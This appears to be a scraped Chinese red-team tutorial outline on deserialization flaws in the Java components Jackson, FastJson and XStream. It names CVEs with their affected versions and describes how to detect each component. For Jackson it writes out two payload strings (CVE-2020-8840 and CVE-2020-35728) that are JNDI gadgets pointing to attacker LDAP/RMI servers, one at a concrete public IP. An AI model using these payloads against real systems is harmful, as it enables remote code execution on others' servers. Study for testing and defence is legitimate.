当前位置: 首页 > news >正文

红队攻防渗透技术实战流程:组件安全:JacksonFastJsonXStream

红队攻防渗透实战

  • 1. 组件安全
    • 1.1 J2EE-组件Jackson-本地demo&CVE
      • 1.1.1 代码执行 (CVE-2020-8840)
      • 1.1.2 代码执行(CVE-2020-35728)
    • 1.2 J2EE-组件FastJson-本地demo&CVE
      • 1.2.1 FastJson <= 1.2.24
      • 1.2.2 FastJson <= 1.2.47
      • 1.2.3 FastJson <= 1.2.80
    • 1.3 J2EE-组件XStream-本地demo&CVE
      • 1.3.1 代码代码执行 (CVE-2021-21351)
      • 1.3.2 远程代码执行(CVE-2021-29505)

1. 组件安全

黑盒检测:Java应用 请求参数数据以json/xml格式发送测试
黑盒判断:通过提交数据报错信息得到什么组件
xml格式(xstream) 或 json 格式(fastjson jackson)
白盒:直接看引用组件版本

1.1 J2EE-组件Jackson-本地demo&CVE

当下流行的json解释器,主要负责处理Json的序列化和反序列化。
历史漏洞:https://avd.aliyun.com/search?q=Jackson

1.1.1 代码执行 (CVE-2020-8840)

2.0.0 <= FasterXML jackson-databind Version <= 2.9.10.2
String json = “[“org.apache.xbean.propertyeditor.JndiConverter”, {“asText”:“ldap://localhost:1389/Exploit”}]”;

1.1.2 代码执行(CVE-2020-35728)

FasterXML jackson-databind 2.x < 2.9.10.8
String payload = “[“com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool”,{“jndiPath”:“rmi://47.94.236.117:1099/gtaafz”}]”;

http://www.lryc.cn/news/373120.html

相关文章:

  • Perl 语言学习进阶
  • LangGraph实战:从零分阶打造人工智能航空客服助手
  • R可视化:R语言基础图形合集
  • mysql导入sql文件失败及解决措施
  • JS:获取鼠标点击位置
  • 使用开源的zip.cpp和unzip.cpp实现压缩包的创建与解压(附源码)
  • npm 异常:peer eslint@“>=1.6.0 <7.0.0“ from eslint-loader@2.2.1
  • Docker|了解容器镜像层(2)
  • 使用Python爬取temu商品与评论信息
  • mybatis学习--自定义映射resultMap
  • Elasticsearch之写入原理以及调优
  • python中装饰器的用法
  • php实现一个简单的MySQL分页
  • 算法训练营day23补签
  • 国密SM2JS加密后端解密
  • Cheat Engine.exe修改植物大战僵尸阳光与冷却
  • python内置模块之queue(队列)用法
  • Spring Security——结合JWT实现令牌的验证与授权
  • Vector的底层结构剖析
  • 实现抖音视频滑动功能vue3+swiper
  • Linux文件系统【真的很详细】
  • JAVA学习笔记DAY5——Spring_Ioc
  • WPF中的隧道路由和冒泡路由事件
  • ISO七层模型 tcp/ip
  • MySQL的三种重要的日志
  • 神经网络学习2
  • Spring Boot整合Redis通过Zset数据类型+定时任务实现延迟队列
  • Android入门第69天-AndroidStudio中的Gradle使用国内镜像最强教程
  • 深入浅出 Qt 中 QListView 的设计思想,并掌握大规模、高性能列表的实现方法
  • 课设--学生成绩管理系统